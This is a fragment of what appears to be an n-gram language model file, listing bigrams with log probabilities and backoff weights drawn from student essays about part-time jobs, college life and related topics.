-0.67003465 forgo a -0.048957378
-0.67003465 known a -0.048957378
-0.67003465 flip a -0.048957378
-0.67003465 sustain a -0.048957378
-0.5695075 holding a -0.187397
-0.67003465 supply a -0.048957378
-0.67003465 hold-down a -0.048957378
-0.67003465 coin a -0.048957378
-0.67003465 Obliging a -0.048957378
-0.67003465 Implementing a -0.048957378
-0.94793266 affect a -0.048957378
-0.94793266 inhaling a -0.048957378
-0.67003465 contracting a -0.048957378
-2.3087664 for part-time -0.048957378
-1.6438224 several part-time -0.048957378
-1.7389517 that part-time -0.2403142
-2.029831 having part-time -0.048957378
-1.1177863 a part-time -1.3923726
-2.4884188 the part-time -0.048957378
-2.2031236 , part-time -0.3864422
-2.4073236 not part-time -0.048957378
-2.1750138 many part-time -0.048957378
-1.1748263 any part-time -0.13618872
-2.6630845 in part-time -0.048957378
-2.5596447 and part-time -0.048957378
-1.9850084 of part-time -0.1722646
-2.744822 to part-time -0.048957378
-2.5252903 their part-time -0.048957378
-1.2943524 working part-time -0.048957378
-1.5264637 work part-time -0.099168696
-1.1523616 otherwise part-time -0.048957378
-2.082084 only part-time -0.048957378
-1.5243121 have part-time -0.8438233
-1.7573609 And part-time -0.048957378
-1.5961238 offer part-time -0.048957378
-1.6334323 These part-time -0.048957378
-1.8974323 through part-time -0.048957378
-1.4365401 first part-time -0.187397
-1.9796 This part-time -0.048957378
-2.2110343 do part-time -0.048957378
-1.8734152 take part-time -0.048957378
-0.9825856 works part-time -0.048957378
-1.7599086 A part-time -0.40449065
-0.9825856 fill part-time -0.048957378
-1.8478122 own part-time -0.048957378
-1.7916908 find part-time -0.048957378
-1.5480624 best part-time -0.048957378
-1.9903675 much part-time -0.048957378
-1.6361138 worked part-time -0.048957378
-1.7971907 getting part-time -0.048957378
-0.9825856 so-called part-time -0.048957378
-0.94271684 Working part-time -0.048957378
-0.687964 average part-time -0.048957378
-1.2710757 Although part-time -0.048957378
-1.1523616 appropriate part-time -0.048957378
-1.8027608 had part-time -0.048957378
-0.687964 located part-time -0.048957378
-0.687964 take-up part-time -0.048957378
-0.9825856 seek part-time -0.048957378
-0.9825856 lucrative part-time -0.048957378
-1.3732088 a job -0.15678221
-0.7087217 part-time job -0.37823045
-1.6573156 full-time job -0.04895735
-1.9248476 the job -0.07613316
-1.5016552 any job -0.048957378
-2.549091 of job -0.048957378
-2.9251566 to job -0.048957378
-2.6717951 their job -0.048957378
-2.1752765 time job -0.26071677
-1.670574 available job -0.048957378
-2.2004402 one job -0.048957378
-1.4486567 's job -0.048957378
-1.8783722 career job -0.048957378
-1.3744649 Part-time job -0.048957378
-2.2617576 part job -0.048957378
-0.69060683 selecting job -0.048957378
-1.6151336 same job -0.048957378
-1.4500074 first job -0.04895735
-2.007869 good job -0.048957378
-1.7943124 your job -0.048957378
-2.1926434 what job -0.048957378
-1.7639813 real job -0.048957378
-2.073198 world job -0.048957378
-1.3762115 particular job -0.048957378
-1.7107438 against job -0.048957378
-1.1618836 simple job -0.048957378
-1.5132296 her job -0.048957378
-1.1601064 research job -0.048957378
-2.5747726 <s> is -0.048957378
-1.1584741 this is -0.04895735
-0.7414061 it is -0.33447385
-1.2771456 that is -0.067588836
-1.7215374 job is -0.09435647
-1.4571247 student is -0.04895735
-1.8540161 , is -0.07333779
-2.0975692 not is -0.048957378
-2.1619341 and is -0.048957378
-1.974936 study is -0.048957378
-1.0616643 studying is -0.048957378
-1.7227138 experience is -0.048957378
-2.107548 working is -0.048957378
-1.1708717 restaurant is -0.04895735
-0.53915143 there is -0.16349243
-1.0263927 reason is -0.12260215
-2.32355 students is -0.048957378
-1.9288254 studies is -0.048957378
-1.2727435 time is -0.048957378
-1.7532738 jobs is -0.13618872
-1.9612126 one is -0.048957378
-1.6072118 school is -0.048957378
-2.1956942 work is -0.048957378
-1.4717736 f is -0.048957378
-1.8563898 but is -0.048957378
-1.5368943 only is -0.048957378
-1.6732265 necessary is -0.048957378
-1.4566386 college is -0.04895735
-0.9604758 Time is -0.048957378
-1.56093 money is -0.048957378
-1.9339943 so is -0.048957378
-2.0325963 or is -0.048957378
-0.6766042 option is -0.048957378
-1.4343196 consider is -0.048957378
-2.0460365 important is -0.048957378
-1.9463924 who is -0.048957378
-1.6584053 environment is -0.048957378
-1.5094854 There is -0.13618872
-1.6129107 food is -0.048957378
-0.9604758 alternative is -0.048957378
-1.4296668 This is -0.11876416
-1.0262637 College is -0.15595351
-1.3750327 major is -0.048957378
-1.7272403 classes is -0.048957378
-1.3171583 what is -0.048957378
-1.7295225 provide is -0.048957378
-1.8008249 society is -0.048957378
-1.4782304 done is -0.048957378
-1.2364912 area is -0.048957378
-1.3178025 grades is -0.048957378
-1.6753868 It is -0.13773204
-1.7849132 activities is -0.048957378
-1.7890021 how is -0.048957378
-1.2550827 life is -0.048957378
-1.4343196 graduates is -0.048957378
-1.3819261 cards is -0.048957378
-1.6506981 income is -0.048957378
-0.7504657 which is -0.04895735
-1.4717736 expenses is -0.048957378
-1.6790636 family is -0.048957378
-1.3178025 period is -0.048957378
-1.4717736 adult is -0.048957378
-1.208696 way is -0.048957378
-1.3750327 factor is -0.048957378
-0.6963953 situation is -0.048957378
-1.5733624 education is -0.04895735
-1.8560715 world is -0.048957378
-1.554436 success is -0.048957378
-1.3819261 provides is -0.048957378
-1.2364912 training is -0.048957378
-1.4265275 cost is -0.048957378
-1.229098 That is -0.048957378
-0.9604758 question is -0.048957378
-0.9604758 effectiveness is -0.048957378
-1.4717736 someone is -0.048957378
-1.9314169 learn is -0.048957378
-1.820775 much is -0.048957378
-1.4276518 problem is -0.048957378
-1.4410915 change is -0.048957378
-1.1200609 concerned is -0.048957378
-1.1200609 ethics is -0.048957378
-0.6766042 Suffering is -0.048957378
-1.3750327 tasks is -0.048957378
-1.229098 labor is -0.048957378
-0.6766042 timing is -0.048957378
-1.6735891 Japan is -0.048957378
-1.461853 purpose is -0.048957378
-0.6766042 burgers is -0.048957378
-1.7334212 think is -0.048957378
-1.4717736 made is -0.048957378
-0.9604758 everyone is -0.048957378
-1.229098 hour is -0.048957378
-1.2047175 day is -0.048957378
-0.9604758 coworkers is -0.048957378
-1.310668 homework is -0.048957378
-0.6766042 dinner is -0.048957378
-0.6766042 contrary is -0.048957378
-1.3178025 drinking is -0.048957378
-0.97948325 point is -0.13618872
-0.7866275 she is -0.048957378
-1.6002579 opinion is -0.048957378
-0.6766042 Studying is -0.048957378
-0.6963953 careers is -0.048957378
-0.6766042 School is -0.048957378
-0.6766042 profession is -0.048957378
-1.3750327 everything is -0.048957378
-1.1200609 resume is -0.048957378
-0.6766042 eIt is -0.048957378
-1.310668 goal is -0.048957378
-1.229098 schedule is -0.048957378
-1.1200609 graduating is -0.048957378
-0.9604758 challenge is -0.048957378
-0.6766042 cwhich is -0.048957378
-0.9604758 burger is -0.048957378
-1.7211461 health is -0.048957378
-1.310668 mind is -0.048957378
-0.6766042 academics is -0.048957378
-0.6766042 Failure is -0.048957378
-0.6766042 administration is -0.048957378
-0.6766042 Money is -0.048957378
-0.6766042 Communication is -0.048957378
-1.7472156 restaurants is -0.048957378
-0.6766042 bounty is -0.048957378
-0.6766042 enlightenment is -0.048957378
-0.6766042 onus is -0.048957378
-1.229098 here is -0.048957378
-1.1926798 smoking is -0.048957378
-1.1009245 smoke is -0.11268411
-0.6766042 premise is -0.048957378
-0.6766042 employee is -0.048957378
-2.6831064 be valuable -0.048957378
-2.060176 a valuable -0.048957378
-2.4851818 is valuable -0.048957378
-1.2878569 acquire valuable -0.048957378
-1.7760226 many valuable -0.048957378
-2.9865563 of valuable -0.048957378
-1.5712947 very valuable -0.048957378
-1.8648952 little valuable -0.048957378
-1.7845614 gain valuable -0.048957378
-2.8372316 students valuable -0.048957378
-2.05868 -LRB- valuable -0.048957378
-2.6631584 have valuable -0.048957378
-2.3820214 them valuable -0.048957378
-1.9166003 provide valuable -0.048957378
-2.0122468 make valuable -0.048957378
-0.6922843 builds valuable -0.048957378
-2.045974 valuable preparation -0.048957378
-3.2102208 and preparation -0.048957378
-2.08053 good preparation -0.048957378
-0.9944986 effective preparation -0.048957378
-1.7123908 a full-time -0.28822482
-3.1451926 and full-time -0.048957378
-2.689774 of full-time -0.187397
-2.1955636 studying full-time -0.048957378
-2.1073205 even full-time -0.048957378
-0.9939372 formal full-time -0.048957378
-2.386663 <s> the -0.048957378
-0.7790162 with the -0.08969047
-0.80062336 for the -0.14029449
-1.1939235 While the -0.048957378
-1.6728754 be the -0.048957378
-1.2217203 that the -0.14516217
-1.9707681 job the -0.048957378
-1.2893914 is the -0.08630035
-1.7400146 student the -0.048957378
-1.1939235 acquire the -0.048957378
-1.2679067 , the -0.073127195
-1.6690676 often the -0.048957378
-1.7859917 not the -0.187397
-1.6504872 In the -0.048957378
-0.81935287 by the -0.07333779
-0.873477 in the -0.11459493
-1.8004584 field the -0.048957378
-1.2939773 and the -0.08103798
-0.8074056 of the -0.11205632
-1.1268009 to the -0.084008865
-1.5184982 For the -0.048957378
-1.1939235 engineering the -0.048957378
-1.9127749 experience the -0.048957378
-1.5663689 gain the -0.048957378
-0.8957754 from the -0.067588836
-1.6497837 as the -0.048957378
-2.158488 students the -0.048957378
-0.70090806 on the -0.09782906
-1.817933 also the -0.048957378
-2.050863 time the -0.048957378
-1.3141984 if the -0.04895735
-1.6829814 then the -0.048957378
-1.7415366 but the -0.048957378
-1.2078255 pay the -0.04895735
-1.2274283 have the -0.07333779
-1.5544212 And the -0.048957378
-1.8230162 some the -0.048957378
-1.8094766 so the -0.048957378
-1.5615073 : the -0.048957378
-1.5261137 To the -0.048957378
-1.6821742 become the -0.048957378
-1.723907 or the -0.048957378
-1.3882462 even the -0.048957378
-1.6919174 are the -0.04895735
-1.0030825 offer the -0.048957378
-0.66645676 lays the -0.048957378
-1.1939235 carefully the -0.048957378
-0.90722567 consider the -0.048957378
-1.4209697 By the -0.048957378
-1.0186265 makes the -0.048957378
-1.4301113 helps the -0.048957378
-0.6073866 understanding the -0.04895735
-0.9411728 Besides the -0.048957378
-1.2989424 through the -0.048957378
-0.7231864 into the -0.04895735
-0.684914 increase the -0.187397
-0.7249774 at the -0.1544894
-0.66645676 Saving the -0.048957378
-1.4120166 put the -0.048957378
-1.3733218 see the -0.048957378
-0.9411728 putting the -0.048957378
-1.4939502 help the -0.187397
-1.5922378 when the -0.048957378
-1.8743185 do the -0.048957378
-1.2747293 take the -0.048957378
-1.0453825 use the -0.048957378
-1.6428417 classes the -0.048957378
-1.527917 what the -0.048957378
-0.9411728 conclusion the -0.048957378
-1.1410816 all the -0.048957378
-1.7806445 because the -0.048957378
-1.9110339 them the -0.048957378
-1.4120166 therefore the -0.048957378
-1.6729219 If the -0.048957378
-1.5265831 get the -0.048957378
-1.4120166 teach the -0.187397
-1.7165799 how the -0.048957378
-1.4685501 away the -0.048957378
-1.0484409 give the -0.187397
-1.7792575 fs the -0.048957378
-0.65755606 entering the -0.04895735
-0.974013 up the -0.048957378
-1.3351274 make the -0.04895735
-1.4839096 which the -0.13618872
-0.66645676 restrict the -0.048957378
-0.8267064 during the -0.048957378
-1.0924538 rarely the -0.048957378
-1.5898497 customers the -0.048957378
-1.1117713 enjoy the -0.048957378
-1.3363845 provides the -0.048957378
-1.2685678 improve the -0.048957378
-1.4209697 place the -0.048957378
-1.513063 were the -0.048957378
-1.328324 where the -0.048957378
-1.5965765 find the -0.048957378
-1.3733218 explore the -0.048957378
-1.590543 without the -0.048957378
-1.0527046 about the -0.04895735
-0.39827234 overlook the -0.048957378
-1.2405237 support the -0.048957378
-1.0924538 keep the -0.048957378
-0.5671098 ease the -0.048957378
-0.92050576 learn the -0.5805819
-0.91040474 let the -0.048957378
-1.6635323 than the -0.048957378
-0.9411728 Despite the -0.048957378
-0.958523 enter the -0.187397
-1.2685678 manage the -0.048957378
-0.5671098 beyond the -0.048957378
-0.7622886 outside the -0.04895735
-1.4209697 meet the -0.048957378
-0.36377788 against the -0.08422062
-1.1939235 load the -0.048957378
-1.3733218 until the -0.048957378
-1.566084 go the -0.048957378
-1.0150436 needs the -0.048957378
-0.50294834 understand the -0.30637136
-0.66645676 maturing the -0.048957378
-1.322422 lack the -0.048957378
-1.2685678 allow the -0.048957378
-1.5184982 always the -0.048957378
-1.4532696 since the -0.048957378
-0.91040474 change the -0.048957378
-1.5663689 workplace the -0.048957378
-0.958523 between the -0.048957378
-1.2685678 hold the -0.048957378
-1.0924538 sample the -0.048957378
-1.6191686 want the -0.048957378
-1.0924538 hopefully the -0.048957378
-0.602899 appreciate the -0.048957378
-1.1939235 harder the -0.048957378
-1.4120166 made the -0.048957378
-0.53931296 reduce the -0.13618872
-1.0924538 reach the -0.048957378
-1.4809589 week the -0.048957378
-1.0924538 cause the -0.048957378
-1.4120166 both the -0.048957378
-0.39827234 enrich the -0.048957378
-1.2685678 ultimately the -0.048957378
-1.0924538 fulfill the -0.048957378
-0.66645676 motivate the -0.048957378
-1.3265694 around the -0.048957378
-0.66645676 familiarize the -0.048957378
-0.5671098 choosing the -0.048957378
-0.9411728 Taking the -0.048957378
-1.1939235 Even the -0.048957378
-0.66645676 assured the -0.048957378
-0.5671098 among the -0.048957378
-0.9411728 On the -0.13618872
-1.1939235 Although the -0.048957378
-0.66645676 attain the -0.048957378
-1.4727286 balance the -0.048957378
-1.0924538 Balancing the -0.048957378
-1.3464266 assist the -0.048957378
-0.9411728 recognize the -0.048957378
-0.9411728 experiencing the -0.048957378
-1.1939235 towards the -0.048957378
-1.322422 form the -0.048957378
-1.0924538 receive the -0.048957378
-1.3265694 everything the -0.048957378
-1.1939235 With the -0.048957378
-1.0924538 At the -0.187397
-0.9411728 Also the -0.048957378
-1.2788793 within the -0.048957378
-1.1939235 cover the -0.048957378
-0.66645676 reducing the -0.048957378
-1.0924538 buy the -0.048957378
-0.66645676 reviving the -0.048957378
-0.9411728 onto the -0.048957378
-0.66645676 breakdown the -0.048957378
-1.0924538 leaving the -0.048957378
-0.66645676 selected the -0.048957378
-0.66645676 discovering the -0.048957378
-1.0924538 taught the -0.048957378
-0.66645676 join the -0.048957378
-0.66645676 restricts the -0.048957378
-0.66645676 leaves the -0.048957378
-0.66645676 defray the -0.048957378
-0.5671098 probably the -0.048957378
-0.9411728 namely the -0.048957378
-1.2685678 mind the -0.048957378
-0.9411728 miss the -0.048957378
-0.66645676 lay the -0.048957378
-0.9411728 versus the -0.048957378
-0.9411728 win the -0.048957378
-0.66645676 invest the -0.048957378
-0.66645676 appreciates the -0.048957378
-0.66645676 extol the -0.048957378
-0.66645676 digesting the -0.048957378
-0.66645676 disturbs the -0.048957378
-0.66645676 saddling the -0.048957378
-0.9411728 merely the -0.048957378
-0.66645676 hamstring the -0.048957378
-0.66645676 wife the -0.048957378
-0.9411728 near the -0.048957378
-0.66645676 running the -0.048957378
-1.0924538 nonetheless the -0.048957378
-0.9411728 aside the -0.048957378
-0.66645676 negates the -0.048957378
-0.66645676 represent the -0.048957378
-0.66645676 considering the -0.048957378
-0.66645676 Inside the -0.048957378
-0.66645676 affecting the -0.048957378
-0.66645676 alters the -0.048957378
-0.66645676 concerning the -0.048957378
-0.66645676 promote the -0.048957378
-2.324456 this student -0.048957378
-1.2389748 a student -0.27635497
-1.3130449 the student -0.17955013
-2.7663906 , student -0.048957378
-1.504767 any student -0.048957378
-1.2834638 engineering student -0.048957378
-2.2466435 The student -0.048957378
-1.2424054 college student -0.08422062
-1.4531673 productive student -0.048957378
-1.6198496 same student -0.048957378
-1.7979015 A student -0.048957378
-0.988917 contribute student -0.048957378
-0.69116527 Each student -0.048957378
-2.2885735 my student -0.048957378
-1.1617546 rounded student -0.048957378
-1.7370074 individual student -0.048957378
-0.988917 Every student -0.187397
-0.988917 modern student -0.048957378
-0.69116527 sponsored student -0.048957378
-0.69116527 cloistered student -0.048957378
-0.69116527 first-year student -0.048957378
-0.69116527 questing student -0.048957378
-0.69116527 high-school student -0.048957378
-0.69116527 strapped student -0.048957378
-2.039639 I will -0.048957378
-1.790933 this will -0.048957378
-2.421054 it will -0.048957378
-1.4940202 that will -0.04895735
-2.0680466 job will -0.099168696
-1.6878295 student will -0.048957378
-2.2916522 , will -0.048957378
-2.1507034 many will -0.048957378
-2.360655 and will -0.048957378
-1.7814395 course will -0.048957378
-2.2394748 experience will -0.048957378
-1.5105842 there will -0.048957378
-1.7031771 students will -0.0796529
-2.0725138 studies will -0.048957378
-2.4674735 time will -0.048957378
-1.3731819 jobs will -0.048957378
-1.7634605 focus will -0.048957378
-2.1001005 work will -0.048957378
-1.8029361 college will -0.048957378
-2.3306186 money will -0.048957378
-1.1343398 they will -0.131905
-2.0133057 you will -0.048957378
-1.8386039 career will -0.048957378
-1.0903299 employers will -0.048957378
-2.204642 skills will -0.048957378
-1.3572918 developed will -0.048957378
-1.5500035 position will -0.048957378
-1.5856681 There will -0.048957378
-2.2237115 people will -0.048957378
-1.812616 They will -0.14912641
-1.4295913 eventually will -0.048957378
-1.9613218 This will -0.048957378
-2.113196 what will -0.048957378
-1.5410851 therefore will -0.048957378
-0.9806769 produce will -0.048957378
-1.7921474 It will -0.048957378
-2.2246866 life will -0.048957378
-1.7518512 income will -0.048957378
-2.0692987 which will -0.048957378
-2.1128712 education will -0.048957378
-2.0067453 world will -0.048957378
-1.4929309 universities will -0.048957378
-1.7312759 workplace will -0.048957378
-1.5856681 families will -0.048957378
-1.1495428 Others will -0.048957378
-1.7283225 days will -0.048957378
-1.702872 he will -0.048957378
-0.68699443 correspondence will -0.048957378
-1.2706966 possibilities will -0.048957378
-1.1495428 hierarchies will -0.048957378
-1.6535664 we will -0.048957378
-0.68699443 rejection will -0.048957378
-0.68699443 he\/she will -0.048957378
-1.8652617 restaurants will -0.048957378
-2.7143507 will acquire -0.048957378
-2.7556913 not acquire -0.048957378
-2.90557 to acquire -0.048957378
-2.6932495 it upon -0.048957378
-2.6932502 job upon -0.048957378
-1.2911812 acquire upon -0.048957378
-1.2911812 organization upon -0.048957378
-1.586929 therefore upon -0.048957378
-0.6931254 adjustment upon -0.048957378
-1.5900028 however upon -0.048957378
-0.6931254 programmer upon -0.048957378
-0.6931254 reliance upon -0.048957378
-0.6931254 relied upon -0.048957378
-0.43500787 upon graduation -0.15595351
-2.1187258 their graduation -0.27955192
-1.6420906 following graduation -0.048957378
-0.77736413 after graduation -0.13618872
-1.5341265 her graduation -0.048957378
-0.9939372 post graduation -0.048957378
-1.7055048 with , -0.048957378
-1.4302695 this , -0.048957378
-1.3219002 statement , -0.048957378
-1.8033292 for , -0.048957378
-1.0297863 reasons , -0.5805819
-1.7238758 it , -0.048957378
-1.7306608 that , -0.048957378
-1.6611714 part-time , -0.048957378
-1.1937976 job , -0.09435647
-1.7074049 is , -0.04895735
-1.1503056 student , -0.048957378
-1.4204406 graduation , -0.048957378
-1.2198786 often , -0.048957378
-1.5628576 not , -0.048957378
-1.224646 case , -0.048957378
-0.8450349 cases , -0.048957378
-1.5231128 employment , -0.048957378
-1.8455613 in , -0.048957378
-1.6676689 field , -0.048957378
-1.6018682 and , -0.11268411
-1.8030611 of , -0.048957378
-0.74172163 nature , -0.048957378
-1.8499541 to , -0.048957378
-1.116157 course , -0.048957378
-1.1096603 study , -0.048957378
-0.80762476 example , -0.13418062
-1.1549463 studying , -0.04895735
-1.3897023 little , -0.048957378
-1.6625665 experience , -0.048957378
-1.1812 working , -0.048957378
-1.3911287 restaurant , -0.048957378
-0.6378578 Moreover , -0.04895735
-1.5063295 reason , -0.048957378
-1.3411062 students , -0.1038763
-1.2552154 additional , -0.048957378
-1.224646 stress , -0.048957378
-1.7664974 on , -0.048957378
-0.8861279 studies , -0.048957378
-1.4158753 also , -0.048957378
-0.88881266 increased , -0.048957378
-1.407659 less , -0.048957378
-1.065039 time , -0.062332742
-0.6378578 Additionally , -0.048957378
-1.1263323 jobs , -0.099168696
-1.4092437 one , -0.048957378
-0.74172163 tired , -0.048957378
-1.1071839 focus , -0.048957378
-1.0753907 school , -0.048957378
-1.1743641 work , -0.048957378
-0.88881266 Therefore , -0.08422062
-1.4006647 such , -0.048957378
-0.60410196 -RRB- , -0.0796529
-1.2435713 then , -0.048957378
-1.2088966 pursuing , -0.048957378
-0.6378578 i.e. , -0.048957378
-1.4625019 pay , -0.048957378
-0.7904807 tuition , -0.04895735
-0.8789558 fees , -0.048957378
-0.6378578 Yes , -0.13618872
-1.2162323 college , -0.07333779
-1.7230825 have , -0.048957378
-0.9721074 money , -0.100717194
-1.8057331 they , -0.048957378
-1.2552154 say , -0.048957378
-1.3708935 And , -0.048957378
-1.5889893 some , -0.048957378
-1.3838698 so , -0.048957378
-1.3087261 following , -0.048957378
-1.2552154 begin , -0.048957378
-1.516701 well , -0.048957378
-0.6378578 portals , -0.048957378
-1.2587082 positions , -0.048957378
-1.6315289 are , -0.048957378
-1.4834546 career , -0.048957378
-1.1042644 internships , -0.048957378
-1.3124169 experiences , -0.048957378
-0.6378578 Primarily , -0.048957378
-1.0080253 future , -0.13618872
-1.5498835 more , -0.048957378
-1.4422464 better , -0.048957378
-0.9496069 skills , -0.04895735
-1.6931167 important , -0.048957378
-1.0200102 include , -0.048957378
-0.38624087 commitment , -0.048957378
-1.2869743 management , -0.048957378
-0.88881266 Besides , -0.048957378
-1.3449663 knowledge , -0.048957378
-1.040511 personality , -0.048957378
-1.186661 themselves , -0.187397
-1.3808234 environment , -0.048957378
-1.3124169 position , -0.048957378
-1.7378285 at , -0.048957378
-1.3801541 two , -0.048957378
-1.228235 first , -0.187397
-1.2869743 issue , -0.048957378
-1.5412201 spend , -0.048957378
-0.7846184 food , -0.04895735
-1.1810448 times , -0.048957378
-1.1810448 earned , -0.048957378
-1.4539225 good , -0.048957378
-0.95756686 others , -0.048957378
-1.5242484 parents , -0.048957378
-0.8023583 friends , -0.04895735
-1.0200102 However , -0.09435647
-1.2738377 relationships , -0.048957378
-1.0127653 people , -0.04895735
-1.4543086 This , -0.048957378
-1.2088966 effort , -0.048957378
-0.88881266 stable , -0.048957378
-1.1042644 People , -0.048957378
-1.5802838 help , -0.048957378
-0.95182407 earn , -0.048957378
-1.2088966 major , -0.048957378
-1.3400627 use , -0.048957378
-0.7452157 classes , -0.048957378
-1.3555096 know , -0.048957378
-1.538178 could , -0.048957378
-0.88881266 conclusion , -0.13618872
-1.3069623 all , -0.04895735
-1.4976496 them , -0.048957378
-1.2724897 therefore , -0.048957378
-0.999642 society , -0.04895735
-1.2861314 done , -0.048957378
-0.88881266 specialty , -0.048957378
-0.88881266 produce , -0.048957378
-1.1639768 itself , -0.048957378
-1.0200102 subject , -0.048957378
-1.1810448 grades , -0.048957378
-1.0200102 menial , -0.048957378
-0.6378578 specialist , -0.048957378
-1.2088966 colleges , -0.048957378
-0.8376474 activities , -0.048957378
-1.5137782 social , -0.048957378
-0.88881266 teachers , -0.048957378
-1.2440883 workers , -0.048957378
-1.5104126 believe , -0.048957378
-1.0630832 life , -0.08422062
-1.0706135 responsibilities , -0.048957378
-0.9413238 university , -0.04895735
-1.2977645 up , -0.048957378
-1.2088966 late , -0.048957378
-0.38624087 night , -0.048957378
-1.1042644 sleeping , -0.048957378
-1.1810448 result , -0.048957378
-1.1228919 regard , -0.048957378
-0.5477129 countries , -0.048957378
-0.74172163 debt , -0.048957378
-0.80762476 cards , -0.048957378
-0.80762476 loans , -0.048957378
-0.6378578 flow , -0.048957378
-1.0200102 Firstly , -0.09435647
-1.0200102 myself , -0.048957378
-1.1042644 pressures , -0.048957378
-1.2724897 expenses , -0.048957378
-0.88881266 Often , -0.048957378
-1.5237681 these , -0.048957378
-1.4176418 family , -0.048957378
-0.88881266 savings , -0.048957378
-1.2724897 adult , -0.048957378
-0.8676888 independent , -0.048957378
-0.38624087 Secondly , -0.10298752
-0.6378578 prospects , -0.048957378
-1.2088966 factor , -0.048957378
-1.1810448 ability , -0.048957378
-1.1012976 customers , -0.048957378
-1.3124169 responsible , -0.048957378
-0.6378578 attributes , -0.048957378
-0.6378578 Thirdly , -0.048957378
-0.6378578 scale , -0.048957378
-1.1042644 arguments , -0.048957378
-0.45134044 however , -0.04895735
-0.6378578 condition , -0.048957378
-0.6340687 year , -0.04895735
-1.1991137 education , -0.09038658
-1.3016033 world , -0.048957378
-0.6378578 prioritization , -0.048957378
-0.6378578 multitasking , -0.048957378
-0.98559713 success , -0.048957378
-1.1228919 burden , -0.048957378
-1.2861314 place , -0.048957378
-1.535216 out , -0.048957378
-1.2802602 learning , -0.048957378
-1.1639768 interests , -0.048957378
-1.4483567 about , -0.048957378
-0.88881266 partially , -0.048957378
-0.6378578 blanket , -0.048957378
-0.6378578 supplies , -0.048957378
-1.2552154 impact , -0.048957378
-1.1042644 assignments , -0.048957378
-0.88881266 straightforward , -0.048957378
-1.4405502 support , -0.048957378
-0.582704 second , -0.048957378
-0.66509134 addition , -0.048957378
-0.88881266 store , -0.048957378
-1.0200102 subjects , -0.048957378
-1.2895132 lessons , -0.048957378
-1.0200102 contacts , -0.048957378
-1.2440883 So , -0.048957378
-0.88881266 risks , -0.048957378
-1.1639768 though , -0.048957378
-0.9624528 possible , -0.048957378
-1.1785779 years , -0.048957378
-1.0200102 medicine , -0.048957378
-1.3449663 three , -0.048957378
-1.2861314 enter , -0.048957378
-0.8789558 come , -0.048957378
-0.6378578 Lastly , -0.048957378
-1.3901138 new , -0.048957378
-1.0200102 offers , -0.048957378
-1.1042644 load , -0.048957378
-1.2869743 books , -0.048957378
-0.74172163 now , -0.048957378
-1.3616601 needs , -0.048957378
-0.6378578 moreover , -0.048957378
-0.6378578 Nevertheless , -0.048957378
-1.524814 hard , -0.048957378
-0.6378578 resting , -0.048957378
-0.88881266 solution , -0.048957378
-0.6378578 Generally , -0.048957378
-1.2440883 problem , -0.048957378
-0.6378578 budgeting , -0.048957378
-1.0200102 ethics , -0.048957378
-1.4003539 workplace , -0.048957378
-1.1042644 concern , -0.048957378
-1.2959398 But , -0.048957378
-0.88881266 definition , -0.048957378
-1.2552154 problems , -0.048957378
-1.2724897 perhaps , -0.048957378
-1.0200102 Others , -0.048957378
-0.6378578 older , -0.048957378
-1.1042644 courses , -0.048957378
-1.0200102 rest , -0.048957378
-1.3555096 lives , -0.048957378
-1.510369 things , -0.048957378
-1.3156564 Students , -0.048957378
-1.2088966 tasks , -0.048957378
-0.8633121 Japan , -0.04895735
-1.1639768 rent , -0.048957378
-1.3472437 freedom , -0.048957378
-1.0200102 service , -0.048957378
-1.2587082 anything , -0.048957378
-0.74172163 law , -0.048957378
-0.6378578 smart , -0.048957378
-0.6378578 meaningless , -0.048957378
-0.88881266 knows , -0.048957378
-0.6450027 hours , -0.048957378
-1.3893995 days , -0.048957378
-1.4325385 day , -0.048957378
-0.88881266 frustration , -0.048957378
-0.5477129 First , -0.0796529
-1.4582292 home , -0.048957378
-1.107339 responsibility , -0.048957378
-0.6378578 bed , -0.048957378
-1.0200102 sure , -0.048957378
-1.1639768 homework , -0.048957378
-0.6378578 dormitories , -0.048957378
-0.6378578 breakfast , -0.048957378
-1.0200102 mentioned , -0.048957378
-0.9461563 independence , -0.048957378
-0.88881266 enormous , -0.048957378
-0.88881266 dating , -0.048957378
-1.0200102 easier , -0.048957378
-0.88881266 party , -0.048957378
-1.0200102 Australia , -0.048957378
-1.0200102 studied , -0.048957378
-1.2724897 companies , -0.048957378
-0.88881266 summary , -0.048957378
-0.88881266 wisdom , -0.048957378
-1.4652518 class , -0.048957378
-1.1228919 concentration , -0.048957378
-1.040511 company , -0.048957378
-1.1228919 end , -0.048957378
-1.3577803 individual , -0.048957378
-1.3221623 discipline , -0.048957378
-0.6585086 expectations , -0.048957378
-0.9959331 age , -0.048957378
-0.6378578 Second , -0.04895735
-0.6378578 Usually , -0.048957378
-0.88881266 turn , -0.048957378
-0.6378578 secretary , -0.048957378
-1.0200102 manager , -0.048957378
-0.88881266 treasurer , -0.048957378
-0.6378578 instance , -0.048957378
-1.0200102 budget , -0.048957378
-0.6340687 hand , -0.048957378
-0.6378578 instrument , -0.048957378
-1.0309508 opinion , -0.048957378
-1.2440883 us , -0.048957378
-1.1042644 above , -0.048957378
-0.6378578 hard-work , -0.048957378
-0.6378578 teamwork , -0.04895735
-1.1042644 Although , -0.048957378
-1.1639768 policy , -0.048957378
-0.88881266 schooling , -0.048957378
-0.38624087 Thus , -0.04895735
-1.3156564 balance , -0.048957378
-0.38624087 argument , -0.048957378
-1.0200102 schedules , -0.048957378
-0.6378578 dressed , -0.048957378
-0.88881266 classmates , -0.048957378
-0.5477129 lectures , -0.048957378
-0.88881266 Otherwise , -0.048957378
-0.88881266 wealthy , -0.048957378
-0.6378578 politics , -0.048957378
-1.0200102 expensive , -0.048957378
-1.2738377 children , -0.048957378
-1.040511 old , -0.048957378
-0.6378578 Hence , -0.048957378
-1.0200102 resume , -0.048957378
-1.2440883 long , -0.048957378
-0.88881266 nights , -0.048957378
-1.1810448 growth , -0.048957378
-0.88881266 initiative , -0.048957378
-0.6378578 solving , -0.048957378
-0.6378578 communication , -0.048957378
-0.88881266 Also , -0.13618872
-1.2861314 spending , -0.048957378
-1.1639768 choice , -0.048957378
-0.6378578 although , -0.048957378
-0.6378578 Regardless , -0.048957378
-1.1042644 thereby , -0.048957378
-0.6378578 financing , -0.048957378
-0.74172163 materials , -0.048957378
-0.6378578 products , -0.048957378
-1.0200102 low , -0.048957378
-0.6378578 Furthermore , -0.04895735
-1.1042644 schedule , -0.048957378
-0.88881266 head , -0.048957378
-0.6378578 excels , -0.048957378
-0.38624087 Finally , -0.11310794
-0.6378578 necessities , -0.048957378
-0.6378578 Zealand , -0.187397
-0.6378578 Ultimately , -0.048957378
-1.1042644 wanted , -0.048957378
-0.6378578 Naturally , -0.048957378
-0.38624087 attendant , -0.048957378
